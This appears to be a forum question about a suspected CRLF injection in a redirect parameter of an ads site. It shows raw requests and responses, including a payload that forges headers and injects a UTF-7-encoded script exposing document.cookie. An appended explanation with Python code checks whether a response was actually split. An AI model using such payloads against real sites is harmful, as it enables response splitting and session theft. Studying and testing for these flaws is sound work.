Hello everyone,
I was running a few tests on a website when I came across this:
Request:
GET /accounts?intended_destination=internal_api%2Fcampaigns_dashboard%7Cshow&intended_params=format%3Dhtml HTTP/1.1
Host: ads.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/
Cookie: asdfvsdgnsbaebvrasdxzsbdgnsdfgbasdfvzxbcbndsfbasdfxncbvnx
Connection: close
Cache-Control: max-age=0
When forwarded, the response looked like this:
HTTP/1.1 302 Found
cache-control: no-cache, private
connection: close
content-security-policy: default-src 'self'; connect-src 'self' https://api.example.com https://*.online-metrix.net https://www.googleapis.com https://ton-u.example.com https://twadmedia.s3.amazonaws.com https://upload.example.com https://ajax.googleapis.com https://ssl.google-analytics.com https://stats.g.doubleclick.net; font-src 'self' data: https://ton.example.com https://ton.example.com https://fonts.gstatic.com; frame-src 'self' https://ton.example.com https://amp.twimg.com https://googleads.g.doubleclick.net https://*.online-metrix.net https://ton-u.example.com https://upload.example.com https://www.google.com https://www.googleadservices.com https://www.youtube.com; img-src 'self' https: http://ton.example.com http://*.twimg.com http://*.phobos.apple.com http://*.mzstatic.com https://api.mixpanel.com data:; media-src https://d1uzb6x3u3o65v.cloudfront.net https://ssl.gstatic.com; object-src 'self' https://ton.example.com https://*.online-metrix.net; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://ton.example.com https://*.online-metrix.net https://platform.example.com https://ssl.google-analytics.com https://support.example.com https://www.googleadservices.com https://stats.g.doubleclick.net https://ajax.googleapis.com https://ton.twimg.com https://syndication.example.com https://s1259914507.t.eloqua.com 'nonce-aIc2u/MH1CJ3bqmF45iuEwsSJbQkLPwLPAh6xGncfhg='; style-src 'self' 'unsafe-inline' https://ton.example.com https://support.example.com https://ads.example.com https://ton.twimg.com https://fonts.googleapis.com; report-uri https://example.com/i/csp_report?enforce=true&app_name=OBSWCY3PMNVQ%3D%3D%3D%3D;
content-type: text/html; charset=utf-8
date: Sun, 10 May 2015 06:14:41 GMT
location: https://ads.example.com/accounts/18ce53z27yp/campaigns_dashboard
server: tsa_f
set-cookie: ads_session=BAh7CiIMc2NyaWJlZFsGbCsJ0VNxAAAAEABJIg9jcmVhdGVkX2F0BjoGRUZsKwiFDGo8TQEiEF9jc3JmX3Rva2VuIjFjL2gvTmg4TEI3UmlsWlJIZFluZkdTRkw2eEtHOXQxeUpCNXNaQUpieGhVPSIPc2Vzc2lvbl9pZCIlZGRhODIyY2U3YzRmZTI0ZThkMWEyMDdjOTY3ZGY3MGRJIgpmbGFzaAY7AFRvOiVBY3Rpb25EaXNwYXRjaDo6Rmxhc2g6OkZsYXNoSGFzaAk6CkB1c2VkbzoIU2V0BjoKQGhhc2h7ADoMQGNsb3NlZEY6DUBmbGFzaGVzewc6CWluZm9bsdfvsdfvsdvsdverbwsryhmtyn--etrbetbervw; path=/; expires=Wed, 12-May-2015 06:14:41 GMT; secure; HttpOnly
status: 302 Found
strict-transport-security: max-age=631138519
x-connection-hash: fd9195a7ae2e806fbaa11f8c08aecba1
x-content-type-options: nosniff
x-download-options: noopen
x-frame-options: SAMEORIGIN
x-permitted-cross-domain-policies: none
x-rack-cache: miss
x-request-id: db23c20f08576fc1496bd0883286e2af
x-response-time: 526
x-runtime: 0.065751
x-ua-compatible: IE=Edge,chrome=1
x-xss-protection: 1; mode=BLOCK
Content-Length: 328
<html><body>You are being <a href="https://ads.example.com/accounts/18ce53z27yp/campaigns_dashboard>redirected</a>.</body></html>
After a few hours of fiddling about with different parameters, I think I found a CRLF injection within the “intended_params=format%3Dhtml” parameter which changes the Location header and redirection URL:
Request:
GET /accounts?intended_destination=internal_api%2Fcampaigns_dashboard%7Cshow&intended_params=%0d%0aContentType%3a%20text%2fhtml%3bcharset%3dUTF-7%0d%0aContent-Length%3a%20129%0d%0a%0d%0a%2BADw-html%2BAD4-%2BADw-body%2BAD4-%2BADw-script%2BAD4-alert%28%27XSS,cookies%3a%27%2Bdocument%2ecookie%29%2BADw-%2fscript%2BAD4-%2BADw-%2fbody%2BAD4-%2BADw-%2fhtml%2BAD4 HTTP/1.1
Host: ads.example.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://example.com/
Cookie: asdfvsdgnsbaebvrasdxzsbdgnsdfgbasdfvzxbcbndsfbasdfxncbvnx
Connection: close
Cache-Control: max-age=0
Response:
HTTP/1.1 302 Found
cache-control: no-cache, private
connection: close
content-security-policy: default-src 'self'; connect-src 'self' https://api.example.com https://*.online-metrix.net https://www.googleapis.com https://ton-u.example.com https://twadmedia.s3.amazonaws.com https://upload.example.com https://ajax.googleapis.com https://ssl.google-analytics.com https://stats.g.doubleclick.net; font-src 'self' data: https://ton.example.com https://ton.example.com https://fonts.gstatic.com; frame-src 'self' https://ton.example.com https://amp.twimg.com https://googleads.g.doubleclick.net https://*.online-metrix.net https://ton-u.example.com https://upload.example.com https://www.google.com https://www.googleadservices.com https://www.youtube.com; img-src 'self' https: http://ton.example.com http://*.twimg.com http://*.phobos.apple.com http://*.mzstatic.com https://api.mixpanel.com data:; media-src https://d1uzb6x3u3o65v.cloudfront.net https://ssl.gstatic.com; object-src 'self' https://ton.example.com https://*.online-metrix.net; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://ton.example.com https://*.online-metrix.net https://platform.example.com https://ssl.google-analytics.com https://support.example.com https://www.googleadservices.com https://stats.g.doubleclick.net https://ajax.googleapis.com https://ton.twimg.com https://syndication.example.com https://s1259914507.t.eloqua.com 'nonce-aIc2u/MH1CJ3bqmF45iuEwsSJbQkLPwLPAh6xGncfhg='; style-src 'self' 'unsafe-inline' https://ton.example.com https://support.example.com https://ads.example.com https://ton.twimg.com https://fonts.googleapis.com; report-uri https://example.com/i/csp_report?enforce=true&app_name=OBSWCY3PMNVQ%3D%3D%3D%3D;
content-type: text/html; charset=utf-8
date: Sun, 10 May 2015 06:14:41 GMT
location: https://ads.example.com/accounts/18ce53z27yp/campaigns_dashboard?charset=UTF-7%0D%0AContent-Length%3A+129%0D%0A%0D%0A+ADw-html+AD4-+ADw-body+AD4-+ADw-script+AD4-alert%28%27XSS%2Ccookies%3A%27+document.cookie%29+ADw-%2Fscript+AD4-+ADw-%2Fbody+AD4-+ADw-%2Fhtml+AD4
server: tsa_f
set-cookie: ads_session=BAh7CiIMc2NyaWJlZFsGbCsJ0VNxAAAAEABJIg9jcmVhdGVkX2F0BjoGRUZsKwiFDGo8TQEiEF9jc3JmX3Rva2VuIjFjL2gvTmg4TEI3UmlsWlJIZFluZkdTRkw2eEtHOXQxeUpCNXNaQUpieGhVPSIPc2Vzc2lvbl9pZCIlZGRhODIyY2U3YzRmZTI0ZThkMWEyMDdjOTY3ZGY3MGRJIgpmbGFzaAY7AFRvOiVBY3Rpb25EaXNwYXRjaDo6Rmxhc2g6OkZsYXNoSGFzaAk6CkB1c2VkbzoIU2V0BjoKQGhhc2h7ADoMQGNsb3NlZEY6DUBmbGFzaGVzewc6CWluZm9bsdfvsdfvsdvsdverbwsryhmtyn--etrbetbervw; path=/; expires=Wed, 12-May-2015 06:14:41 GMT; secure; HttpOnly
status: 302 Found
strict-transport-security: max-age=631138519
x-connection-hash: fd9195a7ae2e806fbaa11f8c08aecba1
x-content-type-options: nosniff
x-download-options: noopen
x-frame-options: SAMEORIGIN
x-permitted-cross-domain-policies: none
x-rack-cache: miss
x-request-id: db23c20f08576fc1496bd0883286e2af
x-response-time: 526
x-runtime: 0.065751
x-ua-compatible: IE=Edge,chrome=1
x-xss-protection: 1; mode=BLOCK
Content-Length: 328
<html><body>You are being <a href="https://ads.example.com/accounts/18ce53z27yp/campaigns_dashboard?charset=UTF-7%0D%0AContent-Length%3A+129%0D%0A%0D%0A+ADw-html+AD4-+ADw-body+AD4-+ADw-script+AD4-alert%28%27XSS%2Ccookies%3A%27+document.cookie%29+ADw-%2Fscript+AD4-+ADw-%2Fbody+AD4-+ADw-%2Fhtml+AD4">redirected</a>.</body></html>
Is this behavior exploitable in any way? Can I use this to set a cookie or cause HTTP response splitting?
Thanks in advance.
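The check that answers the question is whether the CR and LF bytes survive into the Location header as raw bytes (which would terminate the header line and let the rest of the value become new headers and a body) or come back percent-encoded, which is what the captured response shows (%0D%0A inside the query string, one Location header, the normal 328-byte body). The Python below is an added example, not the poster's code or the site's code: it parses a raw response the way a strict HTTP/1.1 client does and reports whether a split actually happened. It contrasts a constructed naive redirect that concatenates the parameter unencoded with one that rebuilds the query via urlencode; that the captured server re-encodes the value is an assumption drawn from the %0D%0A visible in its Location header, and the injected value used here is constructed and deliberately inert.

```python
from urllib.parse import urlencode

# Redirect target copied from the captured response on the page.
BASE = "https://ads.example.com/accounts/18ce53z27yp/campaigns_dashboard"

# Constructed test value: a CRLF pair, a made-up header, a blank line and a body.
INJECTED_VALUE = "UTF-7\r\nX-Injected: 1\r\n\r\n<html>injected</html>"


def parse_response(raw: bytes):
    """Split a raw HTTP/1.1 response into (status_line, [(name, value)], body).

    Header lines are separated on CRLF only, as a strict client would do it;
    a lenient client that also accepts a bare LF would be more permissive.
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip().lower().decode("latin-1"),
                        value.strip().decode("latin-1")))
    return lines[0].decode("latin-1"), headers, body


def redirect_naive(query: str) -> bytes:
    """Constructed defect: the raw query string is concatenated into Location.

    Raw CR/LF in the value end the header line, so whatever follows is parsed
    by the client as further headers and a body.
    """
    location = BASE + "?" + query
    return ("HTTP/1.1 302 Found\r\nLocation: " + location + "\r\n\r\n").encode("latin-1")


def redirect_encoded(params: dict) -> bytes:
    """Assumed behaviour of the captured server: the query is rebuilt with
    urlencode, so CR and LF in any value become %0D%0A and cannot end the line."""
    location = BASE + "?" + urlencode(params)
    return ("HTTP/1.1 302 Found\r\nLocation: " + location + "\r\n\r\n").encode("latin-1")


def split_detected(raw: bytes) -> dict:
    """Summarise what a client would see: extra headers beyond Location and a
    non-empty body mean the response was split; %0D%0A inside Location means
    the CRLF was neutralised by encoding."""
    _, headers, body = parse_response(raw)
    location = next((v for n, v in headers if n == "location"), "")
    return {
        "header_count": len(headers),
        "extra_headers": [n for n, _ in headers if n != "location"],
        "body_injected": len(body) > 0,
        "location_encoded_crlf": "%0D%0A" in location.upper(),
    }


if __name__ == "__main__":
    print("naive:  ", split_detected(redirect_naive("charset=" + INJECTED_VALUE)))
    print("encoded:", split_detected(redirect_encoded({"charset": INJECTED_VALUE})))
```

Run against the naive builder the parser reports a second header and a body; run against the encoding builder it reports a single Location header, no body, and %0D%0A inside the URL, which is the pattern in the captured response. The same parser can be pointed at a saved raw response (bytes from a proxy, not the browser's rendered headers) to confirm which case a server falls into; the browser's developer tools already normalise the header block and hide the difference.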